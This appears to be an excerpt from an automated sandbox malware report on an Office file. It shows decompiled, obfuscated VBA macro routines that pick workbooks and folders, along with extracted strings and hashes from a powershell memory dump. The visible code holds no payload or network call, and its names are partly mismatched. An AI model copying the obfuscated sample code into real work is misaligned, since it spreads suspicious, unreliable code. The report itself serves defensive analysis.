      "&"
      ","
      Line | Instruction | Meta Information
      47

      Function gajowisjd90asdilkf() as Object

      48

      On Error Resume Next

      49

      Dim coll as New Collection, WB as Workbook

      Collection

      50

      For Each WB in Workbooks

      Workbooks

      51

      If WB.name <> ThisWorkbook.name Then

      name

      ThisWorkbook

      52

      If Windows(WB.name).Visible Then

      Windows

      name

      52

      coll.Add CStr(WB.name)

      Add

      CStr

      name

      52

      Endif

      53

      Endif

      54

      Next WB

      Workbooks

      55

      Select Case coll.Count

      Count

      56

      Case 0

      57

      MsgBox ",", vbCritical, ","

      MsgBox

      vbCritical

      58

      Case 1

      59

      Set GetAnotherWorkbook = Workbooks(coll(1))

      Workbooks

      60

      Case Else

      61

      For i = 1 To coll.Count

      Count

      62

      txt = txt & i & vbTab & coll(i) & vbNewLine

      vbTab

      vbNewLine

      63

      Next i

      Count

      64

      msg = "&" & vbNewLine & vbNewLine & txt

      vbNewLine

      65

      res = InputBox(msg, ",", 1)

      InputBox

      66

      If IsNumeric(res) Then

      IsNumeric

      66

      Set GetAnotherWorkbook = Workbooks(coll(Val(res)))

      Workbooks

      Val

      66

      Endif

      67

      End Select

      Count

      68

      End Function

      APIs | Meta Information

      GetAnotherWorkbook

      MsgBox

      FullName

      vbInformation

      MsgBox

      vbCritical

      Range

      Strings | Decrypted Strings
      "&"
      "&"
      ","
      "a2"
      Line | Instruction | Meta Information
      27

      Sub fbkaw4lkuwgbtlske()

      28

      Dim WB as Workbook

      29

      Set WB = GetAnotherWorkbook

      GetAnotherWorkbook

      30

      If Not WB Is Nothing Then

      31

      MsgBox "&" & WB.FullName, vbInformation

      MsgBox

      FullName

      vbInformation

      32

      Else

      33

      MsgBox ",", vbCritical

      MsgBox

      vbCritical

      33

      Exit Sub

      34

      Endif

      35

      x = WB.Worksheets(1).Range("a2")

      Range

      36

      End Sub

      APIs | Meta Information

      GetFolderPath

      Path

      ThisWorkbook

      MsgBox

      vbInformation

      Strings | Decrypted Strings
      ","
      """"
      ":"
      Line | Instruction | Meta Information
      18

      Sub sfoliq3hwoqihepolfijp()

      19

      gjpo4jaiwledkgls = GetFolderPath(",", ThisWorkbook.Path)

      GetFolderPath

      Path

      ThisWorkbook

      20

      If gjpo4jaiwledkgls = "" Then

      20

      Exit Sub

      20

      Endif

      21

      MsgBox ":" & gjpo4jaiwledkgls, vbInformation

      MsgBox

      vbInformation

      22

      End Sub

      APIs | Meta Information

      PathSeparator

      Application

      Right$

      Right$

      Strings | Decrypted Strings
      ":"
      Line | Instruction | Meta Information
      9

      Function dsfl3hadfkb3lkahfoiauhfcfgkwy3jfrkiwed(optional ByVal Title as String = ",", optional ByVal InitialPath as String = ":") as String

      10

      Dim PS as String

      10

      PS = Application.PathSeparator

      PathSeparator

      Application

      11

      With Application.FileDialog(msoFileDialogFolderPicker)

      12

      If Not Right$(InitialPath, 1) = PS Then

      Right$

      12

      InitialPath = InitialPath & PS

      12

      Endif

      13

      . ButtonName = ":"

      13

      . Title = Title

      13

      . InitialFileName = InitialPath

      14

      If . Show <> - 1 Then

      14

      Exit Function

      14

      Endif

      15

      If Not Right$(GetFolderPath, 1) = PS Then

      Right$

      15

      GetFolderPath = GetFolderPath & PS

      15

      Endif

      16

      End With

      17

      End Function

      APIs / Meta Information: FileToVBAFunction, Print

      Strings / Decrypted Strings: ","

      Line  Instruction                                   Meta Information
      23    Sub dfloaswehortiwholehfolsihlkw()
      24    txt$ = FileToVBAFunction(",", ",")            FileToVBAFunction
      25    Debug.Print txt$                              Print
      26    End Sub


        Executed Functions

        Memory Dump Source
        • Source File: 00000004.00000002.443276378.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_7ff00260000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: c1252dd2c919e1d5a190e2ab872a6b4b6d3a24d15b6e001cddec133c7cf8ddbb
        • Instruction ID: 8bc04c71c152c975316cebeebba1ce3fdd828d95d4baaca200ec28099c7dd158
        • Opcode Fuzzy Hash: c1252dd2c919e1d5a190e2ab872a6b4b6d3a24d15b6e001cddec133c7cf8ddbb
        • Instruction Fuzzy Hash: 0711966144E3C68FE3038B745C252907FB1AF53254B5A00CBD8C5CA0B3E25D4A6ACB62
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Memory Dump Source
        • Source File: 00000004.00000002.443276378.000007FF00260000.00000040.00000001.sdmp, Offset: 000007FF00260000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_7ff00260000_powershell.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 5c90478dfe5a969590b5197933eb184c20530005b81b941c82d525693f168d14
        • Instruction ID: 96a79c208aafb5fe6c733985a6cd2f2520b19b17ce9f10e360e277eff933b4c3
        • Opcode Fuzzy Hash: 5c90478dfe5a969590b5197933eb184c20530005b81b941c82d525693f168d14
        • Instruction Fuzzy Hash: 29F07AA650E3C28FD703477498683903F716F13219F1E00CBD080DF0E3E6584A4AE762
        Uniqueness

        Uniqueness Score: -1.00%